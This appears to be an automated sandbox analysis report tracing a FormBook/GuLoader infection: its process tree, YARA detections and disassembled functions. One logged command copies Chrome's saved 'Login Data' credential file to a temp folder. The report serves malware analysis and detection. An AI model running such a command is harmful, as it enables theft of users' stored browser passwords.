                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: ieinstal.exe PID: 5244 Parent PID: 6420

                      General

                      Start time:14:54:52
                      Start date:13/01/2022
                      Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                      Imagebase:0x150000
                      File size:480256 bytes
                      MD5 hash:DAD17AB737E680C47C8A44CBB95EE67E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: ieinstal.exe PID: 4540 Parent PID: 6420

                      General

                      Start time:14:54:53
                      Start date:13/01/2022
                      Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                      Imagebase:0x150000
                      File size:480256 bytes
                      MD5 hash:DAD17AB737E680C47C8A44CBB95EE67E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: ieinstal.exe PID: 6256 Parent PID: 6420

                      General

                      Start time:14:54:54
                      Start date:13/01/2022
                      Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                      Imagebase:0x150000
                      File size:480256 bytes
                      MD5 hash:DAD17AB737E680C47C8A44CBB95EE67E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000012.00000000.495265082.0000000002D00000.00000040.00000001.sdmp, Author: Joe Security
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: explorer.exe PID: 3440 Parent PID: 6256

                      General

                      Start time:14:55:09
                      Start date:13/01/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff6f22f0000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:high

                      Chronological Activities

                      Analysis Process: autochk.exe PID: 5460 Parent PID: 3440

                      General

                      Start time:14:55:42
                      Start date:13/01/2022
                      Path:C:\Windows\SysWOW64\autochk.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\SysWOW64\autochk.exe
                      Imagebase:0xd60000
                      File size:871424 bytes
                      MD5 hash:34236DB574405291498BCD13D20C42EB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Chronological Activities

                      Analysis Process: cmstp.exe PID: 3504 Parent PID: 3440

                      General

                      Start time:14:55:43
                      Start date:13/01/2022
                      Path:C:\Windows\SysWOW64\cmstp.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\cmstp.exe
                      Imagebase:0xeb0000
                      File size:82944 bytes
                      MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

                      Chronological Activities

                      Analysis Process: cmd.exe PID: 5276 Parent PID: 3504

                      General

                      Start time:14:55:55
                      Start date:13/01/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                      Imagebase:0x2a0000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Chronological Activities

                      Analysis Process: conhost.exe PID: 5228 Parent PID: 5276

                      General

                      Start time:14:55:56
                      Start date:13/01/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff61de10000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Chronological Activities

                      Analysis Process: ieinstal.exe PID: 3232 Parent PID: 3440

                      General

                      Start time:14:55:58
                      Start date:13/01/2022
                      Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\internet explorer\ieinstal.exe"
                      Imagebase:0x150000
                      File size:480256 bytes
                      MD5 hash:DAD17AB737E680C47C8A44CBB95EE67E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Chronological Activities

                      Analysis Process: ieinstal.exe PID: 6084 Parent PID: 3440

                      General

                      Start time:14:56:06
                      Start date:13/01/2022
                      Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\internet explorer\ieinstal.exe"
                      Imagebase:0x150000
                      File size:480256 bytes
                      MD5 hash:DAD17AB737E680C47C8A44CBB95EE67E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Chronological Activities

                      Analysis Process: explorer.exe PID: 6392 Parent PID: 6024

                      General

                      Start time:14:56:16
                      Start date:13/01/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
                      Imagebase:0x7ff6f22f0000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Chronological Activities

                      Analysis Process: explorer.exe PID: 6664 Parent PID: 2156

                      General

                      Start time:14:57:18
                      Start date:13/01/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
                      Imagebase:0x7ff6f22f0000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Chronological Activities

                      Disassembly

                      Code Analysis

                      Reset < >

                        Analysis Process: powershell.exe PID: 6420 Parent PID: 7072 powershell.exeCOMMON

                        Execution Graph

                        Execution Coverage:6.6%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:36
                        Total number of Limit Nodes:3

                        Graph

                        execution_graph 20641 d11920 20642 d11932 20641->20642 20645 d14278 20642->20645 20643 d11961 20646 d14292 20645->20646 20647 d142b7 20646->20647 20650 d14331 20646->20650 20654 d14340 20646->20654 20647->20643 20651 d14353 20650->20651 20658 d143a8 20651->20658 20655 d14353 20654->20655 20657 d143a8 GetFileAttributesW 20655->20657 20656 d14371 20656->20647 20657->20656 20660 d143cd 20658->20660 20659 d14371 20659->20647 20660->20659 20664 d14948 20660->20664 20661 d14492 20661->20659 20662 d14948 GetFileAttributesW 20661->20662 20662->20659 20670 d14948 GetFileAttributesW 20664->20670 20671 d149a8 20664->20671 20665 d14972 20666 d14978 20665->20666 20676 d13f9c 20665->20676 20666->20661 20670->20665 20672 d149c0 20671->20672 20673 d149d5 20672->20673 20674 d13f9c GetFileAttributesW 20672->20674 20673->20665 20675 d14a06 20674->20675 20675->20665 20677 d14df0 GetFileAttributesW 20676->20677 20679 d14a06 20677->20679 20679->20661 20631 761f748 20637 761edc4 20631->20637 20633 761f77d 20635 761f844 CreateFileW 20636 761f881 20635->20636 20638 761f7f0 CreateFileW 20637->20638 20640 761f767 20638->20640 20640->20633 20640->20635

                        Executed Functions

                        Function 07617E00, Relevance: .7, Instructions: 688COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000004.00000002.562493421.0000000007610000.00000040.00000001.sdmp, Offset: 07610000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7610000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7f3b5c4bc06fceda45600b50387262f78ff7f4ee6f4970b161bd936931265860
                        • Instruction ID: c686319a3526a8c81db496c8f0175b4f5479624e3705414b66426c82c302db86
                        • Opcode Fuzzy Hash: 7f3b5c4bc06fceda45600b50387262f78ff7f4ee6f4970b161bd936931265860
                        • Instruction Fuzzy Hash: 26524BB060021ACFDB15DF74C854BAA73B2FF89314F1585A9E90AAB360DB35DD41CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D1CDF8, Relevance: .2, Instructions: 231COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000004.00000002.551378345.0000000000D10000.00000040.00000001.sdmp, Offset: 00D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_d10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ac67bba5913e3f49dd4547b46a85b23fe7a1d433a7ea6d8fcf1ec104c615a1a3
                        • Instruction ID: 2df60e61daffc346a3fd971a08f26c524ec2dc2394ff8b346d885b3335704c8d
                        • Opcode Fuzzy Hash: ac67bba5913e3f49dd4547b46a85b23fe7a1d433a7ea6d8fcf1ec104c615a1a3
                        • Instruction Fuzzy Hash: 11A18B70600605AFE719DF24D4947AE7BE3BF88304F148569E5029B3A5CF74DD85CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0761F748, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 18 761f748-761f77b call 761edc4 22 761f7a6-761f83c 18->22 23 761f77d-761f7a5 18->23 32 761f844-761f87f CreateFileW 22->32 33 761f83e-761f841 22->33 34 761f881-761f887 32->34 35 761f888-761f8a5 32->35 33->32 34->35
                        Memory Dump Source
                        • Source File: 00000004.00000002.562493421.0000000007610000.00000040.00000001.sdmp, Offset: 07610000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7610000_powershell.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 7f1ff246f535adda64f277e08df0e048cc5f6a9d98d16c734a92e9650bdaf889
                        • Instruction ID: e6bf3082b5cf81611ae939bcad5c20d75d38a3fb4f41d540c29932f4d053f238
                        • Opcode Fuzzy Hash: 7f1ff246f535adda64f277e08df0e048cc5f6a9d98d16c734a92e9650bdaf889
                        • Instruction Fuzzy Hash: 694192B1A042199FDB00DFA8D844BDEFFB9FB48314F14816AE909AB381D7759944CBE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0761ED31, Relevance: 1.6, APIs: 1, Instructions: 94fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 38 761ed31-761ed33 39 761ed35-761ed80 38->39 40 761ed9c-761edab 38->40 42 761ee14-761ee1a 40->42 43 761edad-761f83c 40->43 48 761f844-761f87f CreateFileW 43->48 49 761f83e-761f841 43->49 50 761f881-761f887 48->50 51 761f888-761f8a5 48->51 49->48 50->51
                        APIs
                        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0761F767,00000000,00000000,00000003,00000000,00000002), ref: 0761F872
                        Memory Dump Source
                        • Source File: 00000004.00000002.562493421.0000000007610000.00000040.00000001.sdmp, Offset: 07610000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7610000_powershell.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 21a07d47c8cd8df769fdcf1a09c2141fa8456d2f64a09a23df96af2da64518b5
                        • Instruction ID: a4daf4f8d08dab0af7ad7f5caac3f802034e96c5a3fc22240c2273ab92491934
                        • Opcode Fuzzy Hash: 21a07d47c8cd8df769fdcf1a09c2141fa8456d2f64a09a23df96af2da64518b5
                        • Instruction Fuzzy Hash: 3B31B0B2C093999FCB01CFA9D858ADEBFB4FF0A310F08459AE845A7611C3349955CBE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0761ED88, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 54 761ed88-761edab 58 761ee14-761ee1a 54->58 59 761edad-761f83c 54->59 64 761f844-761f87f CreateFileW 59->64 65 761f83e-761f841 59->65 66 761f881-761f887 64->66 67 761f888-761f8a5 64->67 65->64 66->67
                        APIs
                        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0761F767,00000000,00000000,00000003,00000000,00000002), ref: 0761F872
                        Memory Dump Source
                        • Source File: 00000004.00000002.562493421.0000000007610000.00000040.00000001.sdmp, Offset: 07610000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7610000_powershell.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 60ffebef7e93295071898bab26d9acde5aef03be5a84eba0739b4d3e298e842f
                        • Instruction ID: 7bb5c4adaf7ad578680006d360d74ea824fdddbb31511cb87739d9c527ea92dd
                        • Opcode Fuzzy Hash: 60ffebef7e93295071898bab26d9acde5aef03be5a84eba0739b4d3e298e842f
                        • Instruction Fuzzy Hash: A631AFB2C052599FCB01DFA9D858ADEBFB4FF09314F04896AE805A7A00C3349950CFE5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0761EDC4, Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 70 761edc4-761f83c 73 761f844-761f87f CreateFileW 70->73 74 761f83e-761f841 70->74 75 761f881-761f887 73->75 76 761f888-761f8a5 73->76 74->73 75->76
                        APIs
                        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0761F767,00000000,00000000,00000003,00000000,00000002), ref: 0761F872
                        Memory Dump Source
                        • Source File: 00000004.00000002.562493421.0000000007610000.00000040.00000001.sdmp, Offset: 07610000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7610000_powershell.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: f4818fa1df54354a6baace599290315ad8d502fe16a88c97563bec6be3a8fff0
                        • Instruction ID: 9a4268e6a4d07956c0cd1908f02f404ec362d17338fa2c1ecb0c4c65c0ff6d08
                        • Opcode Fuzzy Hash: f4818fa1df54354a6baace599290315ad8d502fe16a88c97563bec6be3a8fff0
                        • Instruction Fuzzy Hash: 4F2125B1D0061AABCB10CF99D844ADEFBB4FB48314F14852AE919B7710C374A954CFE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D14DE8, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 79 d14de8-d14e3a 81 d14e42-d14e6d GetFileAttributesW 79->81 82 d14e3c-d14e3f 79->82 83 d14e76-d14e93 81->83 84 d14e6f-d14e75 81->84 82->81 84->83
                        APIs
                        • GetFileAttributesW.KERNELBASE(00000000), ref: 00D14E60
                        Memory Dump Source
                        • Source File: 00000004.00000002.551378345.0000000000D10000.00000040.00000001.sdmp, Offset: 00D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_d10000_powershell.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: 0b2f31902ff13d322b0eebceee2cbbea8ecbe08ad364cd19417d51c49fbcdd4d
                        • Instruction ID: a6f058621c01ef62f3e069e3abe5d10b6bc9afb5d76e4985a862039317c7cf75
                        • Opcode Fuzzy Hash: 0b2f31902ff13d322b0eebceee2cbbea8ecbe08ad364cd19417d51c49fbcdd4d
                        • Instruction Fuzzy Hash: E41103B1D006199BCB10CFA9E5446DEFBB4FB88724F14852AE819B7700D774AA45CFE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D13F9C, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 87 d13f9c-d14e3a 90 d14e42-d14e6d GetFileAttributesW 87->90 91 d14e3c-d14e3f 87->91 92 d14e76-d14e93 90->92 93 d14e6f-d14e75 90->93 91->90 93->92
                        APIs
                        • GetFileAttributesW.KERNELBASE(00000000), ref: 00D14E60
                        Memory Dump Source
                        • Source File: 00000004.00000002.551378345.0000000000D10000.00000040.00000001.sdmp, Offset: 00D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_d10000_powershell.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: f649d69813cf8907ce889c83b4bcdc5035162554145b3f1b909e219f71e845c2
                        • Instruction ID: e9873e6fc9a3bac3acb9dbff0a07fab254b3f50fa019acb20f628470c113a846
                        • Opcode Fuzzy Hash: f649d69813cf8907ce889c83b4bcdc5035162554145b3f1b909e219f71e845c2
                        • Instruction Fuzzy Hash: 202110B1D046199BCB10CFAAE8446DEFBB4BB88724F14812AE918B7600D774A940CFE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0082D01D, Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000004.00000002.550301790.000000000082D000.00000040.00000001.sdmp, Offset: 0082D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_82d000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7cd6a23efa7946db390040d9c24972aaa3037aabf726e3e106f4f120ba5d017f
                        • Instruction ID: 405b7103790c094cee7a826d5a5a7c96937f973b1fd0fab405282e859692845b
                        • Opcode Fuzzy Hash: 7cd6a23efa7946db390040d9c24972aaa3037aabf726e3e106f4f120ba5d017f
                        • Instruction Fuzzy Hash: E901F731408B54AAE7108F51E884767BFC8FF41768F18C41AEC449B293C3799885C6B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0082D01C, Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000004.00000002.550301790.000000000082D000.00000040.00000001.sdmp, Offset: 0082D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_82d000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b7d495864e95854b6915a48862a75d3a63eb09e8e01fba5a6c8320aefca651b0
                        • Instruction ID: a87a2b2c0637ca23fb0b779a44369bbda14d7db47ea3031abcd7226d7fe2c68f
                        • Opcode Fuzzy Hash: b7d495864e95854b6915a48862a75d3a63eb09e8e01fba5a6c8320aefca651b0
                        • Instruction Fuzzy Hash: 65F0AF71404754AAEB108A15D884B62FFD8EF91724F18C45AED488F282C3B99844CAB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 00D1DED8, Relevance: 5.0, Strings: 3, Instructions: 1287COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.551378345.0000000000D10000.00000040.00000001.sdmp, Offset: 00D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_d10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: D!m$T:m$t%m
                        • API String ID: 0-1058837607
                        • Opcode ID: 94e0cf65e34a5eb96279f64bbaab8cab8c1dd4c27186a03216fdbc2b7dca81d3
                        • Instruction ID: c291ae08d72110bc65148b36642f681c0d96c334f2483718187cb0b8aff37fd0
                        • Opcode Fuzzy Hash: 94e0cf65e34a5eb96279f64bbaab8cab8c1dd4c27186a03216fdbc2b7dca81d3
                        • Instruction Fuzzy Hash: 0AA29D7070021C9FEB24DBB49C61BBE3567EFC5704F158128A5069F3C9DEB58DA24BA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Analysis Process: ieinstal.exe PID: 6256 Parent PID: 6420 ieinstal.exeCOMMON

                        Execution Graph

                        Execution Coverage:0.7%
                        Dynamic/Decrypted Code Coverage:99.4%
                        Signature Coverage:57.4%
                        Total number of Nodes:698
                        Total number of Limit Nodes:34

                        Graph

                        execution_graph 16434 1ed01190 16435 1ed011a0 16434->16435 16437 1ed011be 16434->16437 16435->16437 16438 1ed011e0 16435->16438 16439 1ed01204 16438->16439 16440 1ed4b640 _vswprintf_s 11 API calls 16439->16440 16441 1ed01296 16440->16441 16441->16437 16442 1edb239a 16443 1edb23d5 16442->16443 16444 1ed4b640 _vswprintf_s 11 API calls 16443->16444 16445 1edb23df 16444->16445 16446 1ed8b111 16447 1ed8b131 16446->16447 16448 1ed8b143 16446->16448 16450 1ed921b7 16447->16450 16453 1ed4e3a0 16450->16453 16456 1ed4e3bd 16453->16456 16455 1ed4e3b8 16455->16448 16457 1ed4e3e3 16456->16457 16458 1ed4e3cc 16456->16458 16460 1ed4b58e _vswprintf_s 11 API calls 16457->16460 16461 1ed4e3d8 _vswprintf_s 16457->16461 16459 1ed4b58e _vswprintf_s 11 API calls 16458->16459 16459->16461 16460->16461 16461->16455 16462 1ed09240 16463 1ed0924c _vswprintf_s 16462->16463 16464 1ed0927e GetPEB 16463->16464 16465 1ed277f0 16464->16465 16466 1ed0929a GetPEB 16465->16466 16467 1ed277f0 16466->16467 16468 1ed092b6 GetPEB 16467->16468 16470 1ed092d2 16468->16470 16469 1ed09330 16470->16469 16471 1ed09305 GetPEB 16470->16471 16472 1ed0931f _vswprintf_s 16471->16472 15762 1ed49540 LdrInitializeThunk 16473 1ed01e04 16474 1ed01e10 _vswprintf_s 16473->16474 16476 1ed01e37 _vswprintf_s 16474->16476 16478 1edca80d 16474->16478 16479 1edca81c 16478->16479 16480 1ed5f18b 16478->16480 16482 1edbff41 16479->16482 16483 1edbff4d _vswprintf_s 16482->16483 16484 1edbffaf _vswprintf_s 16483->16484 16486 1edc2073 16483->16486 16484->16480 16496 1edbfd22 16486->16496 16488 1edc207d 16489 1edc20a4 16488->16489 16490 1edc2085 16488->16490 16491 1edc20be 16489->16491 16507 1edc1c06 GetPEB 16489->16507 16499 1edb8df1 16490->16499 16491->16484 16497 1ed49670 _vswprintf_s LdrInitializeThunk 16496->16497 16498 1edbfd3d 16497->16498 16498->16488 16563 1ed5d0e8 16499->16563 16501 1edb8dfd GetPEB 16502 1edb8e10 16501->16502 16503 1ed95720 _vswprintf_s 11 API calls 16502->16503 16504 1edb8e2f 16502->16504 16503->16504 16505 1ed5d130 _vswprintf_s 11 API calls 16504->16505 16506 1edb8ebd 16505->16506 16506->16484 16508 1edc1c3d 16507->16508 16509 1edc1c20 GetPEB 16507->16509 16511 1ed0b150 _vswprintf_s 11 API calls 16508->16511 16510 1ed0b150 _vswprintf_s 11 API calls 16509->16510 16512 1edc1c3a 16510->16512 16511->16512 16513 1ed0b150 _vswprintf_s 11 API calls 16512->16513 16514 1edc1c5a GetPEB 16513->16514 16516 1edc1d04 16514->16516 16517 1edc1ce7 GetPEB 16514->16517 16519 1ed0b150 _vswprintf_s 11 API calls 16516->16519 16518 1ed0b150 _vswprintf_s 11 API calls 16517->16518 16520 1edc1d01 16518->16520 16519->16520 16521 1ed0b150 _vswprintf_s 11 API calls 16520->16521 16522 1edc1d1c 16521->16522 16523 1edc1d66 16522->16523 16524 1edc1d27 GetPEB 16522->16524 16525 1edc1d70 GetPEB 16523->16525 16526 1edc1daf 16523->16526 16527 1edc1d4f 16524->16527 16528 1edc1d32 GetPEB 16524->16528 16529 1edc1d98 16525->16529 16530 1edc1d7b GetPEB 16525->16530 16531 1edc1db9 GetPEB 16526->16531 16532 1edc1df8 16526->16532 16534 1ed0b150 _vswprintf_s 11 API calls 16527->16534 16533 1ed0b150 _vswprintf_s 11 API calls 16528->16533 16537 1ed0b150 _vswprintf_s 11 API calls 16529->16537 16535 1ed0b150 _vswprintf_s 11 API calls 16530->16535 16539 1edc1dc4 GetPEB 16531->16539 16540 1edc1de1 16531->16540 16536 1edc1e0a GetPEB 16532->16536 16544 1edc1e52 GetPEB 16532->16544 16538 1edc1d4c 16533->16538 16534->16538 16541 1edc1d95 16535->16541 16545 1edc1e15 GetPEB 16536->16545 16546 1edc1e32 16536->16546 16537->16541 16547 1ed0b150 _vswprintf_s 11 API calls 16538->16547 16542 1ed0b150 _vswprintf_s 11 API calls 16539->16542 16543 1ed0b150 _vswprintf_s 11 API calls 16540->16543 16549 1ed0b150 _vswprintf_s 11 API calls 16541->16549 16548 1edc1dde 16542->16548 16543->16548 16552 1edc1e5d GetPEB 16544->16552 16553 1edc1e7a 16544->16553 16550 1ed0b150 _vswprintf_s 11 API calls 16545->16550 16551 1ed0b150 _vswprintf_s 11 API calls 16546->16551 16547->16523 16556 1ed0b150 _vswprintf_s 11 API calls 16548->16556 16549->16526 16557 1edc1e2f 16550->16557 16551->16557 16554 1ed0b150 _vswprintf_s 11 API calls 16552->16554 16555 1ed0b150 _vswprintf_s 11 API calls 16553->16555 16558 1edc1e77 16554->16558 16555->16558 16556->16532 16559 1ed0b150 _vswprintf_s 11 API calls 16557->16559 16560 1ed0b150 _vswprintf_s 11 API calls 16558->16560 16561 1edc1e4f 16559->16561 16562 1edc1e90 GetPEB 16560->16562 16561->16544 16562->16491 16563->16501 16564 1ed537cc 16565 1ed537db 16564->16565 16567 1ed537ea 